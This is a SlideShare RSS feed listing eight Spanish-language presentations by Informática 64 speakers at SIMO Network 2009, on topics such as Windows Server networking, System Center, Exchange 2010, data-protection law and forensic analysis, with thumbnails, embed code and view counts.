<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:activity="http://activitystrea.ms/spec/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:slideshare="http://slideshare.net/api/1" version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Slideshows by User: chemai64</title>
    <link>http://www.slideshare.net/</link>
    <image>
      <url>http://www.slideshare.net/images/logo.gif</url>
      <title>Slideshows by User: chemai64</title>
      <link>http://www.slideshare.net/</link>
    </image>
    <pubDate>Sat, 12 Dec 2009 08:28:16 GMT</pubDate>
    <description>SlideShare feed for Slideshows by User: chemai64</description>
    <item>
      <title>Wifi Segura con D-Link Windows Server 2008 R2</title>
      <link>http://www.slideshare.net/chemai64/wifi-segura-con-dlink-windows-server-2008-r2</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo12-dl-04wifiseguracond-linkwindowsnogal-091212023036-phpapp01-thumbnail-2?1260606733" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Francisco Nogal, de Informática 64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo12-dl-04wifiseguracond-linkwindowsnogal-091212023036-phpapp01-thumbnail-2?1260606733" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Francisco Nogal, de Informática 64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:28:16 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/wifi-segura-con-dlink-windows-server-2008-r2</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/wifi-segura-con-dlink-windows-server-2008-r2"/>
        <media:title>Wifi Segura con D-Link Windows Server 2008 R2</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Francisco Nogal, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo12-dl-04wifiseguracond-linkwindowsnogal-091212023036-phpapp01-thumbnail-2?1260606733&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Francisco Nogal, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo12-dl-04wifiseguracond-linkwindowsnogal-091212023036-phpapp01-thumbnail-2?1260606733" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703170"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/wifi-segura-con-dlink-windows-server-2008-r2" title="Wifi Segura con D-Link Windows Server 2008 R2">Wifi Segura con D-Link Windows Server 2008 R2</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo12-dl-04wifiseguracond-linkwindowsnogal-091212023036-phpapp01&stripped_title=wifi-segura-con-dlink-windows-server-2008-r2" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo12-dl-04wifiseguracond-linkwindowsnogal-091212023036-phpapp01&stripped_title=wifi-segura-con-dlink-windows-server-2008-r2" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>41</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo12-dl-04wifiseguracond-linkwindowsnogal-091212023036-phpapp01-thumbnail-2?1260606733</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Switching D Link &amp;amp; NAP Windows Server 2008 R2</title>
      <link>http://www.slideshare.net/chemai64/switching-d-link-nap-windows-server-2008-r2</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo11-dl-02switchingd-linknapwindowsnogal-091212022954-phpapp01-thumbnail-2?1260606629" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Francisco Nogal, de Informática 64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo11-dl-02switchingd-linknapwindowsnogal-091212022954-phpapp01-thumbnail-2?1260606629" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Francisco Nogal, de Informática 64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:27:35 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/switching-d-link-nap-windows-server-2008-r2</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/switching-d-link-nap-windows-server-2008-r2"/>
        <media:title>Switching D Link &amp;amp; NAP Windows Server 2008 R2</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Francisco Nogal, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo11-dl-02switchingd-linknapwindowsnogal-091212022954-phpapp01-thumbnail-2?1260606629&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Francisco Nogal, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo11-dl-02switchingd-linknapwindowsnogal-091212022954-phpapp01-thumbnail-2?1260606629" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703168"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/switching-d-link-nap-windows-server-2008-r2" title="Switching D Link &amp; NAP Windows Server 2008 R2">Switching D Link &amp; NAP Windows Server 2008 R2</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo11-dl-02switchingd-linknapwindowsnogal-091212022954-phpapp01&stripped_title=switching-d-link-nap-windows-server-2008-r2" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo11-dl-02switchingd-linknapwindowsnogal-091212022954-phpapp01&stripped_title=switching-d-link-nap-windows-server-2008-r2" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>54</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo11-dl-02switchingd-linknapwindowsnogal-091212022954-phpapp01-thumbnail-2?1260606629</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>System Center Operation Manager 2007 R2 SCOM</title>
      <link>http://www.slideshare.net/chemai64/system-center-operation-manager-2007-r2-scom</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo10scom2007r2joshua-091212022757-phpapp01-thumbnail-2?1260606543" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Joshua Sáenz, de Informática 64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo10scom2007r2joshua-091212022757-phpapp01-thumbnail-2?1260606543" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Joshua Sáenz, de Informática 64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:26:47 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/system-center-operation-manager-2007-r2-scom</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/system-center-operation-manager-2007-r2-scom"/>
        <media:title>System Center Operation Manager 2007 R2 SCOM</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Joshua S&#225;enz, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo10scom2007r2joshua-091212022757-phpapp01-thumbnail-2?1260606543&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Joshua S&#225;enz, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo10scom2007r2joshua-091212022757-phpapp01-thumbnail-2?1260606543" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703165"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/system-center-operation-manager-2007-r2-scom" title="System Center Operation Manager 2007 R2 SCOM">System Center Operation Manager 2007 R2 SCOM</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo10scom2007r2joshua-091212022757-phpapp01&stripped_title=system-center-operation-manager-2007-r2-scom" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo10scom2007r2joshua-091212022757-phpapp01&stripped_title=system-center-operation-manager-2007-r2-scom" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>79</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo10scom2007r2joshua-091212022757-phpapp01-thumbnail-2?1260606543</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>System Center Configuration Manager 2007 R2 SCCM</title>
      <link>http://www.slideshare.net/chemai64/system-center-configuration-manager-2007-r2-sccm</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo09sccm2007r2joshua-091212022816-phpapp01-thumbnail-2?1260606537" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Joshua Sáenz, de Informática 64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo09sccm2007r2joshua-091212022816-phpapp01-thumbnail-2?1260606537" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Joshua Sáenz, de Informática 64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:26:43 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/system-center-configuration-manager-2007-r2-sccm</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/system-center-configuration-manager-2007-r2-sccm"/>
        <media:title>System Center Configuration Manager 2007 R2 SCCM</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Joshua S&#225;enz, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo09sccm2007r2joshua-091212022816-phpapp01-thumbnail-2?1260606537&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Joshua S&#225;enz, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo09sccm2007r2joshua-091212022816-phpapp01-thumbnail-2?1260606537" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703164"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/system-center-configuration-manager-2007-r2-sccm" title="System Center Configuration Manager 2007 R2 SCCM">System Center Configuration Manager 2007 R2 SCCM</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo09sccm2007r2joshua-091212022816-phpapp01&stripped_title=system-center-configuration-manager-2007-r2-sccm" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo09sccm2007r2joshua-091212022816-phpapp01&stripped_title=system-center-configuration-manager-2007-r2-sccm" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>97</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo09sccm2007r2joshua-091212022816-phpapp01-thumbnail-2?1260606537</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Exchange Server 2010</title>
      <link>http://www.slideshare.net/chemai64/exchange-server-2010</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo08exc2010joshua-091212022648-phpapp02-thumbnail-2?1260606454" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Joshua Sáenz, de Informática 64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo08exc2010joshua-091212022648-phpapp02-thumbnail-2?1260606454" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Joshua Sáenz, de Informática 64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:25:31 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/exchange-server-2010</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/exchange-server-2010"/>
        <media:title>Exchange Server 2010</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Joshua S&#225;enz, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo08exc2010joshua-091212022648-phpapp02-thumbnail-2?1260606454&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Joshua S&#225;enz, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo08exc2010joshua-091212022648-phpapp02-thumbnail-2?1260606454" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703160"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/exchange-server-2010" title="Exchange Server 2010">Exchange Server 2010</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo08exc2010joshua-091212022648-phpapp02&stripped_title=exchange-server-2010" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo08exc2010joshua-091212022648-phpapp02&stripped_title=exchange-server-2010" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>78</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo08exc2010joshua-091212022648-phpapp02-thumbnail-2?1260606454</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Aplicaci&#243;n LOPD</title>
      <link>http://www.slideshare.net/chemai64/aplicacin-lopd</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo07lopdjuanluis-091212022521-phpapp02-thumbnail-2?1260606372" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Juan Luís Rambla, de Informática 64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo07lopdjuanluis-091212022521-phpapp02-thumbnail-2?1260606372" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Juan Luís Rambla, de Informática 64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:25:00 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/aplicacin-lopd</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/aplicacin-lopd"/>
        <media:title>Aplicaci&#243;n LOPD</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Juan Lu&#237;s Rambla, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo07lopdjuanluis-091212022521-phpapp02-thumbnail-2?1260606372&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Juan Lu&#237;s Rambla, de Inform&#225;tica 64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo07lopdjuanluis-091212022521-phpapp02-thumbnail-2?1260606372" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703158"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/aplicacin-lopd" title="Aplicación LOPD">Aplicación LOPD</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo07lopdjuanluis-091212022521-phpapp02&stripped_title=aplicacin-lopd" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo07lopdjuanluis-091212022521-phpapp02&stripped_title=aplicacin-lopd" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>116</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo07lopdjuanluis-091212022521-phpapp02-thumbnail-2?1260606372</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Forefront Threat Management Gateway TMG</title>
      <link>http://www.slideshare.net/chemai64/forefront-threat-management-gateway-tmg</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo06tmgjuanluis-091212022520-phpapp01-thumbnail-2?1260606370" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Juan Luís Rambla, de Informática64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo06tmgjuanluis-091212022520-phpapp01-thumbnail-2?1260606370" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Juan Luís Rambla, de Informática64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:24:14 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/forefront-threat-management-gateway-tmg</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/forefront-threat-management-gateway-tmg"/>
        <media:title>Forefront Threat Management Gateway TMG</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Juan Lu&#237;s Rambla, de Inform&#225;tica64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo06tmgjuanluis-091212022520-phpapp01-thumbnail-2?1260606370&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Juan Lu&#237;s Rambla, de Inform&#225;tica64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo06tmgjuanluis-091212022520-phpapp01-thumbnail-2?1260606370" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703156"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/forefront-threat-management-gateway-tmg" title="Forefront Threat Management Gateway TMG">Forefront Threat Management Gateway TMG</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo06tmgjuanluis-091212022520-phpapp01&stripped_title=forefront-threat-management-gateway-tmg" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo06tmgjuanluis-091212022520-phpapp01&stripped_title=forefront-threat-management-gateway-tmg" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>83</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo06tmgjuanluis-091212022520-phpapp01-thumbnail-2?1260606370</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>An&#225;lisis Forense</title>
      <link>http://www.slideshare.net/chemai64/anlisis-forense</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo05forensejuanluis-091212022439-phpapp02-thumbnail-2?1260606326" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Juan Luís Rambla, de Informática64, durante el SIMO Network 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/simo05forensejuanluis-091212022439-phpapp02-thumbnail-2?1260606326" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Juan Luís Rambla, de Informática64, durante el SIMO Network 2009.]]>
      </content:encoded>
      <pubDate>Sat, 12 Dec 2009 08:23:42 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/anlisis-forense</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/anlisis-forense"/>
        <media:title>An&#225;lisis Forense</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Juan Lu&#237;s Rambla, de Inform&#225;tica64, durante el SIMO Network 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/simo05forensejuanluis-091212022439-phpapp02-thumbnail-2?1260606326&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Juan Lu&#237;s Rambla, de Inform&#225;tica64, durante el SIMO Network 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/simo05forensejuanluis-091212022439-phpapp02-thumbnail-2?1260606326" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2703155"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/anlisis-forense" title="Análisis Forense">Análisis Forense</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo05forensejuanluis-091212022439-phpapp02&stripped_title=anlisis-forense" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=simo05forensejuanluis-091212022439-phpapp02&stripped_title=anlisis-forense" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>195</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/simo05forensejuanluis-091212022439-phpapp02-thumbnail-2?1260606326</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
